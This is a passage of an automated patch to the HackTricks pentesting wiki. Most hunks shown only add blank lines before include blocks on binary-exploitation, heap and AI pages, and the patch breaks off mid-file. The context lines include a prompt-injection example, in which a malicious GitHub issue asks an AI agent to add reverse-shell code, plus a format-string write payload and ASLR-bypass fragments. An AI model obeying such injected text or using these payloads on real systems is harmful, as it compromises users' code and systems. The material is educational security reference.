From 4b90965712475fb63ce05d5b51299f3c52404718 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot
Date: Wed, 20 Aug 2025 12:46:23 +0000
Subject: [PATCH] Add content from: FiberGateway GR241AG - Full Exploit Chain

---
 src/AI/AI-MCP-Servers.md | 3 +- src/AI/AI-llm-architecture/README.md | 10 +++ src/AI/README.md | 10 +++ .../aw2exec-__malloc_hook.md | 2 + .../arbitrary-write-2-exec/aw2exec-got-plt.md | 3 +- .../README.md | 4 +- .../elf-tricks.md | 7 +- .../aslr/README.md | 5 +- .../pie/README.md | 2 +- .../stack-canaries/README.md | 4 +- .../stack-canaries/print-stack-canary.md | 2 +- .../format-strings/README.md | 3 +- src/binary-exploitation/libc-heap/README.md | 2 + .../libc-heap/bins-and-memory-allocations.md | 4 +- .../libc-heap/fast-bin-attack.md | 3 +- .../heap-functions-security-checks.md | 4 +- .../libc-heap/house-of-roman.md | 2 +- .../libc-heap/large-bin-attack.md | 2 +- .../libc-heap/tcache-bin-attack.md | 2 +- .../libc-heap/unsorted-bin-attack.md | 2 +- .../libc-heap/use-after-free/README.md | 2 +- .../rop-return-oriented-programing/README.md | 5 +- .../rop-return-oriented-programing/ret2csu.md | 2 +- .../ret2dlresolve.md | 2 +- .../ret2lib/README.md | 7 +- .../rop-leaking-libc-address/README.md | 3 +- .../ret2vdso.md | 2 +- .../rop-syscall-execv/README.md | 2 +- .../rop-syscall-execv/ret2syscall-arm64.md | 3 +- .../README.md | 3 +- .../srop-arm64.md | 2 + .../stack-overflow/README.md | 6 +- .../stack-overflow/ret2win/README.md | 2 +- .../stack-overflow/ret2win/ret2win-arm64.md | 2 +- .../stack-pivoting-ebp2ret-ebp-chaining.md | 3 + .../stack-shellcode/stack-shellcode-arm64.md | 2 +- src/crypto-and-stego/esoteric-languages.md | 2 +- .../hash-length-extension-attack.md | 2 +- .../rc4-encrypt-and-decrypt.md | 3 +- .../basic-forensic-methodology/README.md | 13 +++- .../linux-forensics.md | 2 +- .../partitions-file-systems-carving/README.md | 4 +- .../pcap-inspection/README.md | 7 +- .../README.md | 10 ++- .../windows-forensics/README.md | 2 +- .../external-recon-methodology/README.md | 5 +- .../pentesting-network/README.md | 8 
++- .../pentesting-network/pentesting-ipv6.md | 66 +++++++++++++++++-- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 2 +- .../pentesting-wifi/README.md | 2 +- .../phishing-methodology/README.md | 7 +- .../clipboard-hijacking.md | 5 +- .../phishing-documents.md | 3 +- .../python/bypass-python-sandboxes/README.md | 3 + ...s-pollution-pythons-prototype-pollution.md | 2 +- .../firmware-analysis/README.md | 3 +- .../bypass-bash-restrictions/README.md | 3 +- .../README.md | 2 +- src/linux-hardening/freeipa-pentesting.md | 2 +- .../linux-post-exploitation/README.md | 2 +- .../privilege-escalation/README.md | 18 ++++- .../containerd-ctr-privilege-escalation.md | 3 +- .../docker-security/README.md | 13 +++- .../README.md | 6 +- .../docker-security/docker-privileged.md | 5 +- .../docker-security/namespaces/README.md | 8 ++- .../namespaces/cgroup-namespace.md | 2 +- .../escaping-from-limited-bash.md | 3 +- .../interesting-groups-linux-pe/README.md | 5 +- .../linux-active-directory.md | 4 +- .../linux-capabilities.md | 2 +- .../nfs-no_root_squash-misconfiguration-pe.md | 2 +- .../runc-privilege-escalation.md | 2 +- .../wildcards-spare-tricks.md | 50 +++++++++++++- .../macos-red-teaming/README.md | 7 +- .../macos-red-teaming/macos-mdm/README.md | 3 +- .../README.md | 12 +++- .../mac-os-architecture/README.md | 5 +- .../README.md | 6 +- .../README.md | 3 +- .../macos-bypassing-firewalls.md | 1 + .../README.md | 6 +- .../macos-privilege-escalation.md | 4 +- .../macos-proces-abuse/README.md | 11 +++- .../README.md | 6 +- .../macos-xpc/README.md | 3 +- .../macos-xpc/macos-xpc-authorization.md | 2 +- .../README.md | 3 +- ...s-xpc_connection_get_audit_token-attack.md | 3 +- .../macos-library-injection/README.md | 4 +- .../macos-dyld-process.md | 2 +- .../macos-security-protections/README.md | 6 +- .../macos-fs-tricks/README.md | 2 +- .../macos-sandbox/README.md | 2 +- .../macos-sandbox-debug-and-bypass/README.md | 5 +- .../macos-tcc/README.md | 4 +- 
.../macos-tcc/macos-tcc-bypasses/README.md | 5 +- .../android-app-pentesting/README.md | 11 +++- .../avd-android-virtual-device.md | 2 +- .../android-app-pentesting/tapjacking.md | 3 +- .../ios-pentesting/README.md | 16 ++++- .../frida-configuration-in-ios.md | 2 +- .../ios-pentesting/ios-testing-environment.md | 3 +- .../11211-memcache/README.md | 2 +- .../137-138-139-pentesting-netbios.md | 2 +- .../2375-pentesting-docker.md | 2 +- .../5353-udp-multicast-dns-mdns.md | 2 +- .../5439-pentesting-redshift.md | 1 + .../5555-android-debug-bridge.md | 1 + .../8089-splunkd.md | 2 +- .../9000-pentesting-fastcgi.md | 2 +- src/network-services-pentesting/9100-pjl.md | 1 + .../9200-pentesting-elasticsearch.md | 1 + .../nfs-service-pentesting.md | 2 +- .../pentesting-compaq-hp-insight-manager.md | 1 + .../pentesting-kerberos-88/README.md | 1 + .../README.md | 6 +- .../pentesting-mysql.md | 2 +- .../pentesting-postgresql.md | 6 +- .../pentesting-rdp.md | 2 +- .../pentesting-smb/README.md | 3 +- .../pentesting-smtp/README.md | 2 +- .../pentesting-snmp/README.md | 3 +- .../pentesting-ssh.md | 1 + .../pentesting-voip/README.md | 2 +- .../basic-voip-protocols/README.md | 2 +- .../pentesting-web/README.md | 5 +- .../pentesting-web/buckets/README.md | 1 + .../buckets/firebase-database.md | 1 + .../pentesting-web/drupal/README.md | 2 +- .../electron-desktop-apps/README.md | 6 +- ...solation-rce-via-electron-internal-code.md | 1 + .../pentesting-web/flask.md | 2 + .../pentesting-web/graphql.md | 3 + .../pentesting-web/microsoft-sharepoint.md | 4 +- .../pentesting-web/nextjs.md | 2 +- .../pentesting-web/nginx.md | 2 +- .../pentesting-web/php-tricks-esp/README.md | 3 + .../pentesting-web/python.md | 4 +- .../pentesting-web/special-http-headers.md | 5 +- .../pentesting-web/symphony.md | 1 + .../pentesting-web/uncovering-cloudflare.md | 1 + .../pentesting-web/werkzeug.md | 1 + .../pentesting-web/wordpress.md | 1 + src/pentesting-web/account-takeover.md | 8 ++- .../README.md | 7 +- 
.../browext-clickjacking.md | 3 +- src/pentesting-web/cache-deception/README.md | 5 +- src/pentesting-web/captcha-bypass.md | 1 + .../client-side-template-injection-csti.md | 1 + src/pentesting-web/command-injection.md | 3 + .../README.md | 5 +- src/pentesting-web/cors-bypass.md | 3 +- src/pentesting-web/crlf-0d-0a.md | 2 + .../csrf-cross-site-request-forgery.md | 2 +- .../README.md | 3 + src/pentesting-web/deserialization/README.md | 8 ++- .../exploiting-__viewstate-parameter.md | 6 +- .../README.md | 2 + src/pentesting-web/file-inclusion/README.md | 11 ++++ .../file-inclusion/phar-deserialization.md | 1 + src/pentesting-web/file-upload/README.md | 1 + .../hacking-jwt-json-web-tokens.md | 3 +- .../hacking-with-cookies/README.md | 4 +- .../hacking-with-cookies/cookie-tossing.md | 3 +- .../http-request-smuggling/README.md | 5 +- src/pentesting-web/ldap-injection.md | 3 +- src/pentesting-web/login-bypass/README.md | 2 +- .../oauth-to-account-takeover.md | 1 + src/pentesting-web/open-redirect.md | 2 +- .../postmessage-vulnerabilities/README.md | 5 +- .../proxy-waf-protections-bypass.md | 2 +- .../registration-vulnerabilities.md | 4 +- src/pentesting-web/reset-password.md | 2 +- src/pentesting-web/saml-attacks/README.md | 4 +- ...inclusion-edge-side-inclusion-injection.md | 2 + src/pentesting-web/sql-injection/README.md | 4 ++ .../sql-injection/mssql-injection.md | 2 +- .../postgresql-injection/README.md | 2 +- .../rce-with-postgresql-extensions.md | 2 + .../rce-with-postgresql-languages.md | 3 +- .../README.md | 6 ++ .../ssrf-vulnerable-platforms.md | 2 +- .../url-format-bypass.md | 1 + .../README.md | 6 ++ .../jinja2-ssti.md | 2 +- .../unicode-injection/README.md | 2 +- .../unicode-normalization.md | 1 + .../web-vulnerabilities-methodology.md | 1 + .../web-vulnerabilities-methodology/README.md | 2 +- src/pentesting-web/websocket-attacks.md | 2 +- src/pentesting-web/xs-search.md | 12 +++- src/pentesting-web/xs-search/README.md | 12 +++- 
.../connection-pool-by-destination-example.md | 2 +- .../event-loop-blocking-+-lazy-images.md | 2 +- ...ble-stylesheet-language-transformations.md | 1 + .../xss-cross-site-scripting/README.md | 20 ++++++ .../abusing-service-workers.md | 2 +- .../xss-cross-site-scripting/dom-xss.md | 2 +- .../iframes-in-xss-and-csp.md | 4 ++ .../integer-overflow.md | 3 +- .../xxe-xee-xml-external-entity.md | 5 +- .../reversing-tools-basic-methods/README.md | 5 ++ src/todo/burp-suite.md | 1 + src/todo/hardware-hacking/jtag.md | 1 + src/todo/other-web-tricks.md | 1 + .../flipper-zero/fz-125khz-rfid.md | 2 +- .../radio-hacking/flipper-zero/fz-ibutton.md | 2 +- .../radio-hacking/flipper-zero/fz-infrared.md | 2 +- src/todo/radio-hacking/flipper-zero/fz-nfc.md | 2 +- src/todo/radio-hacking/ibutton.md | 2 +- src/todo/radio-hacking/infrared.md | 1 + src/todo/radio-hacking/pentesting-rfid.md | 5 +- src/todo/radio-hacking/sub-ghz-rf.md | 2 +- .../active-directory-methodology/README.md | 41 +++++++++++- .../abusing-ad-mssql.md | 3 +- .../acl-persistence-abuse/README.md | 2 +- .../ad-certificates/account-persistence.md | 1 + .../ad-certificates/certificate-theft.md | 2 +- .../ad-certificates/domain-escalation.md | 3 +- .../badsuccessor-dmsa-migration-abuse.md | 1 + .../bloodhound.md | 1 + .../external-forest-domain-oneway-inbound.md | 2 +- .../golden-ticket.md | 2 +- .../printers-spooler-service-abuse.md | 2 + .../resource-based-constrained-delegation.md | 2 + ...nagement-point-relay-sql-policy-secrets.md | 6 +- .../sid-history-injection.md | 4 +- .../silver-ticket.md | 5 +- .../unconstrained-delegation.md | 2 +- .../authentication-credentials-uac-and-efs.md | 3 + .../README.md | 3 + .../uac-user-account-control.md | 2 +- src/windows-hardening/av-bypass.md | 3 + .../basic-powershell-for-pentesters/README.md | 1 + .../powerview.md | 2 +- src/windows-hardening/cobalt-strike.md | 1 + .../lateral-movement/psexec-and-winexec.md | 2 + .../lateral-movement/rdpexec.md | 2 +- 
src/windows-hardening/ntlm/README.md | 3 +- .../README.md | 16 +++++ .../access-tokens.md | 2 +- .../dll-hijacking.md | 2 +- .../dll-hijacking/README.md | 2 +- ...ritable-sys-path-+dll-hijacking-privesc.md | 2 +- .../juicypotato.md | 2 + .../privilege-escalation-abusing-tokens.md | 5 +- .../README.md | 5 +- ...vilege-escalation-with-autorun-binaries.md | 2 +- .../windows-c-payloads.md | 1 + 250 files changed, 829 insertions(+), 197 deletions(-) diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md index d18ff0564..2b19386e7 100644 --- a/src/AI/AI-MCP-Servers.md +++ b/src/AI/AI-MCP-Servers.md @@ -50,6 +50,7 @@ Once connected, the host (inspector or an AI agent like Cursor) will fetch the t For more information about Prompt Injection check: + {{#ref}} AI-Prompts.md {{#endref}} @@ -100,6 +101,7 @@ Another way to perform prompt injection attacks in clients using MCP servers is A user that is giving access to his Github repositories to a client could ask the client to read and fix all the open issues. However, a attacker could **open an issue with a malicious payload** like "Create a pull request in the repository that adds [reverse shell code]" that would be read by the AI agent, leading to unexpected actions such as inadvertently compromising the code. For more information about Prompt Injection check: + {{#ref}} AI-Prompts.md {{#endref}} @@ -156,4 +158,3 @@ The payload can be anything the current OS user can run, e.g. a reverse-shell ba {{#include ../banners/hacktricks-training.md}} - diff --git a/src/AI/AI-llm-architecture/README.md b/src/AI/AI-llm-architecture/README.md index b8da5e211..d55707afe 100644 --- a/src/AI/AI-llm-architecture/README.md +++ b/src/AI/AI-llm-architecture/README.md @@ -8,6 +8,7 @@ You should start by reading this post for some basic concepts you should know about: + {{#ref}} 0.-basic-llm-concepts.md {{#endref}} 
@@ -17,6 +18,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this initial phase is very simple: **Divide the input in tokens (ids) in some way that makes sense**. + {{#ref}} 1.-tokenizing.md {{#endref}} @@ -26,6 +28,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.** + {{#ref}} 2.-data-sampling.md {{#endref}} @@ -38,6 +41,7 @@ You should start by reading this post for some basic concepts you should know ab > > Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute possition of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning). + {{#ref}} 3.-token-embeddings.md {{#endref}} @@ -48,6 +52,7 @@ You should start by reading this post for some basic concepts you should know ab > The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\ > A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information. + {{#ref}} 4.-attention-mechanisms.md {{#endref}} @@ -59,6 +64,7 @@ You should start by reading this post for some basic concepts you should know ab > > This architecture will be used for both, training and predicting text after it was trained. + {{#ref}} 5.-llm-architecture.md {{#endref}} 
@@ -68,6 +74,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model. + {{#ref}} 6.-pre-training-and-loading-models.md {{#endref}} @@ -77,6 +84,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The use of **LoRA reduce a lot the computation** needed to **fine tune** already trained models. + {{#ref}} 7.0.-lora-improvements-in-fine-tuning.md {{#endref}} @@ -86,6 +94,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not). + {{#ref}} 7.1.-fine-tuning-for-classification.md {{#endref}} @@ -95,6 +104,7 @@ You should start by reading this post for some basic concepts you should know ab > [!TIP] > The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot. + {{#ref}} 7.2.-fine-tuning-to-follow-instructions.md {{#endref}} diff --git a/src/AI/README.md b/src/AI/README.md index d31750f5a..166744525 100644 --- a/src/AI/README.md +++ b/src/AI/README.md 
@@ -6,18 +6,22 @@ The best starting point to learn about AI is to understand how the main machine learning algorithms work. This will help you to understand how AI works, how to use it and how to attack it: + {{#ref}} ./AI-Supervised-Learning-Algorithms.md {{#endref}} + {{#ref}} ./AI-Unsupervised-Learning-Algorithms.md {{#endref}} + {{#ref}} ./AI-Reinforcement-Learning-Algorithms.md {{#endref}} + {{#ref}} ./AI-Deep-Learning.md {{#endref}} @@ -26,6 +30,7 @@ The best starting point to learn about AI is to understand how the main machine In the following page you will find the basics of each component to build a basic LLM using transformers: + {{#ref}} AI-llm-architecture/README.md {{#endref}} @@ -36,6 +41,7 @@ AI-llm-architecture/README.md At this moment, the main 2 frameworks to assess the risks of AI systems are the OWASP ML Top 10 and the Google SAIF: + {{#ref}} AI-Risk-Frameworks.md {{#endref}} @@ -44,6 +50,7 @@ AI-Risk-Frameworks.md LLMs have made the use of AI explode in the last years, but they are not perfect and can be tricked by adversarial prompts. This is a very important topic to understand how to use AI safely and how to attack it: + {{#ref}} AI-Prompts.md {{#endref}} @@ -52,6 +59,7 @@ AI-Prompts.md It's very common to developers and companies to run models downloaded from the Internet, however just loading a model might be enough to execute arbitrary code on the system. This is a very important topic to understand how to use AI safely and how to attack it: + {{#ref}} AI-Models-RCE.md {{#endref}} @@ -60,12 +68,14 @@ AI-Models-RCE.md MCP (Model Context Protocol) is a protocol that allows AI agent clients to connect with external tools and data sources in a plug-and-play fashion. This enables complex workflows and interactions between AI models and external systems: + {{#ref}} AI-MCP-Servers.md {{#endref}} ### AI-Assisted Fuzzing & Automated Vulnerability Discovery + {{#ref}} AI-Assisted-Fuzzing-and-Vulnerability-Discovery.md {{#endref}} 
diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md index fd1e44f73..9239931a3 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md @@ -10,6 +10,7 @@ To call malloc it's possible to wait for the program to call it or by **calling More info about One Gadget in: + {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} @@ -21,6 +22,7 @@ More info about One Gadget in: This was abused in one of the example from the page abusing a fast bin attack after having abused an unsorted bin attack: + {{#ref}} ../libc-heap/unsorted-bin-attack.md {{#endref}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md index 28eb4d66b..596ed2a4d 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md @@ -62,6 +62,7 @@ Moreover, if `puts` is used with user input, it's possible to overwrite the `str ## **One Gadget** + {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} @@ -77,6 +78,7 @@ It's possible to find an [**example here**](https://ctf-wiki.mahaloz.re/pwn/linu The **Full RELRO** protection is meant to protect agains this kind of technique by resolving all the addresses of the functions when the binary is started and making the **GOT table read only** after it: + {{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} @@ -89,4 +91,3 @@ The **Full RELRO** protection is meant to protect agains this kind of technique {{#include ../../banners/hacktricks-training.md}} - 
diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md index fb7b1d7d3..865d1db9e 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md @@ -6,12 +6,14 @@ Before start exploiting anything it's interesting to understand part of the structure of an **ELF binary**: + {{#ref}} elf-tricks.md {{#endref}} ## Exploiting Tools + {{#ref}} tools/ {{#endref}} @@ -34,6 +36,7 @@ There are different was you could end controlling the flow of a program: You can find the **Write What Where to Execution** techniques in: + {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} @@ -111,4 +114,3 @@ Something to take into account is that usually **just one exploitation of a vuln {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md index 0df3552a1..ca1b512cf 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md @@ -68,6 +68,7 @@ This stores vendor metadata information about the binary. - On x86-64, `readelf -n` will show `GNU_PROPERTY_X86_FEATURE_1_*` flags inside `.note.gnu.property`. If you see `IBT` and/or `SHSTK`, the binary was built with CET (Indirect Branch Tracking and/or Shadow Stack). This impacts ROP/JOP because indirect branch targets must start with an `ENDBR64` instruction and returns are checked against a shadow stack. See the CET page for details and bypass notes. + {{#ref}} ../common-binary-protections-and-bypasses/cet-and-shadow-stack.md {{#endref}} 
@@ -92,6 +93,7 @@ Note that RELRO can be partial or full, the partial version do not protect the s > For exploitation techniques and up-to-date bypass notes, check the dedicated page: + {{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} @@ -372,7 +374,8 @@ So when a program calls to malloc, it actually calls the corresponding location - `-z now` (Full RELRO) disables lazy binding; PLT entries still exist but GOT/PLT is mapped read-only, so techniques like **GOT overwrite** and **ret2dlresolve** won’t work against the main binary (libraries may still be partially RELRO). See: - {{#ref}} + +{{#ref}} ../common-binary-protections-and-bypasses/relro.md {{#endref}} @@ -382,6 +385,7 @@ So when a program calls to malloc, it actually calls the corresponding location > If GOT/PLT is not an option, pivot to other writeable code-pointers or use classic ROP/SROP into libc. + {{#ref}} ../arbitrary-write-2-exec/aw2exec-got-plt.md {{#endref}} @@ -432,6 +436,7 @@ Moreover, it's also possible to have a **`PREINIT_ARRAY`** with **pointers** tha - For lazy binding abuse of the dynamic linker to resolve arbitrary symbols at runtime, see the dedicated page: + {{#ref}} ../rop-return-oriented-programing/ret2dlresolve.md {{#endref}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md index 6af429529..b01aa318f 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md @@ -210,6 +210,7 @@ p.interactive() Abusing a buffer overflow it would be possible to exploit a **ret2plt** to exfiltrate an address of a function from the libc. Check: + {{#ref}} ret2plt.md {{#endref}} @@ -231,6 +232,7 @@ payload += p32(elf.symbols['main']) You can find more info about Format Strings arbitrary read in: + {{#ref}} ../../format-strings/ {{#endref}} 
@@ -239,6 +241,7 @@ You can find more info about Format Strings arbitrary read in: Try to bypass ASLR abusing addresses inside the stack: + {{#ref}} ret2ret.md {{#endref}} @@ -297,6 +300,7 @@ gef➤ x/4i 0xffffffffff600800 Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized. For more info check: + {{#ref}} ../../rop-return-oriented-programing/ret2vdso.md {{#endref}} @@ -304,4 +308,3 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md index c9e320b49..e95e9ef78 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/pie/README.md @@ -19,6 +19,7 @@ In order to bypass PIE it's needed to **leak some address of the loaded** binary - Be **given** the leak (common in easy CTF challenges, [**check this example**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit)) - **Brute-force EBP and EIP values** in the stack until you leak the correct ones: + {{#ref}} bypassing-canary-and-pie.md {{#endref}} @@ -32,4 +33,3 @@ bypassing-canary-and-pie.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md index 99441d5db..36da583ff 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/README.md 
@@ -33,12 +33,14 @@ In `x86` binaries, the canary cookie is a **`0x4`** byte dword. The f**irst thre - If the **canary is forked in child processes** it might be possible to **brute-force** it one byte at a time: + {{#ref}} bf-forked-stack-canaries.md {{#endref}} - If there is some interesting **leak or arbitrary read vulnerability** in the binary it might be possible to leak it: + {{#ref}} print-stack-canary.md {{#endref}} @@ -47,6 +49,7 @@ print-stack-canary.md The stack vulnerable to a stack overflow might **contain addresses to strings or functions that can be overwritten** in order to exploit the vulnerability without needing to reach the stack canary. Check: + {{#ref}} ../../stack-overflow/pointer-redirecting.md {{#endref}} @@ -76,4 +79,3 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/ {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md index 1ce942487..b886dd25a 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md @@ -23,6 +23,7 @@ Obviously, this tactic is very **restricted** as the attacker needs to be able t With an **arbitrary read** like the one provided by format **strings** it might be possible to leak the canary. Check this example: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) and you can read about abusing format strings to read arbitrary memory addresses in: + {{#ref}} ../../format-strings/ {{#endref}} @@ -33,4 +34,3 @@ With an **arbitrary read** like the one provided by format **strings** it might {{#include ../../../banners/hacktricks-training.md}} - 
diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 1bc091c36..a839a140f 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md @@ -168,6 +168,7 @@ Therefore, this vulnerability allows to **write anything in any address (arbitra In this example, the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Although this could abuse other arbitrary write to exec techniques: + {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} @@ -196,6 +197,7 @@ python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + " You can find a **template** to prepare a exploit for this kind of vulnerability in: + {{#ref}} format-strings-template.md {{#endref}} @@ -241,4 +243,3 @@ It's possible to abuse the write actions of a format string vulnerability to **w {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 5fe3757f9..f506059d7 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md @@ -513,6 +513,7 @@ and inside of it some chunks can be found: Check what are the bins and how are they organized and how memory is allocated and freed in: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -521,6 +522,7 @@ bins-and-memory-allocations.md Functions involved in heap will perform certain check before performing its actions to try to make sure the heap wasn't corrupted: + {{#ref}} heap-memory-functions/heap-functions-security-checks.md {{#endref}} diff --git a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md index 67dc1a77f..39ff87f18 100644 --- a/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md 
+++ b/src/binary-exploitation/libc-heap/bins-and-memory-allocations.md @@ -610,6 +610,7 @@ When malloc is used and a chunk is divided (from the unsorted bin or from the to Check out: + {{#ref}} heap-memory-functions/malloc-and-sysmalloc.md {{#endref}} @@ -618,6 +619,7 @@ heap-memory-functions/malloc-and-sysmalloc.md Check out: + {{#ref}} heap-memory-functions/free.md {{#endref}} @@ -626,6 +628,7 @@ heap-memory-functions/free.md Check the security checks performed by heavily used functions in heap in: + {{#ref}} heap-memory-functions/heap-functions-security-checks.md {{#endref}} @@ -640,4 +643,3 @@ heap-memory-functions/heap-functions-security-checks.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/fast-bin-attack.md b/src/binary-exploitation/libc-heap/fast-bin-attack.md index ebe65b793..b5b26e744 100644 --- a/src/binary-exploitation/libc-heap/fast-bin-attack.md +++ b/src/binary-exploitation/libc-heap/fast-bin-attack.md @@ -6,6 +6,7 @@ For more information about what is a fast bin check this page: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -146,6 +147,7 @@ int main(void) - Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits). - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`. + {{#ref}} unsorted-bin-attack.md {{#endref}} @@ -153,4 +155,3 @@ unsorted-bin-attack.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md index b7161610a..d30975233 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md 
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md @@ -6,6 +6,7 @@ For more info check: + {{#ref}} unlink.md {{#endref}} @@ -23,6 +24,7 @@ This is a summary of the performed checks: For more info check: + {{#ref}} malloc-and-sysmalloc.md {{#endref}} @@ -94,6 +96,7 @@ malloc-and-sysmalloc.md For more info check: + {{#ref}} free.md {{#endref}} @@ -163,4 +166,3 @@ free.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/house-of-roman.md b/src/binary-exploitation/libc-heap/house-of-roman.md index a747e2741..bf8d3a1d0 100644 --- a/src/binary-exploitation/libc-heap/house-of-roman.md +++ b/src/binary-exploitation/libc-heap/house-of-roman.md @@ -75,6 +75,7 @@ uint8_t* malloc_hook_chunk = malloc(0x60); For more info you can check: + {{#ref}} unsorted-bin-attack.md {{#endref}} @@ -118,4 +119,3 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/large-bin-attack.md b/src/binary-exploitation/libc-heap/large-bin-attack.md index 76184cb0a..14603492b 100644 --- a/src/binary-exploitation/libc-heap/large-bin-attack.md +++ b/src/binary-exploitation/libc-heap/large-bin-attack.md @@ -6,6 +6,7 @@ For more information about what is a large bin check this page: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -58,4 +59,3 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/tcache-bin-attack.md b/src/binary-exploitation/libc-heap/tcache-bin-attack.md index 997b1b384..c28767e7b 100644 --- 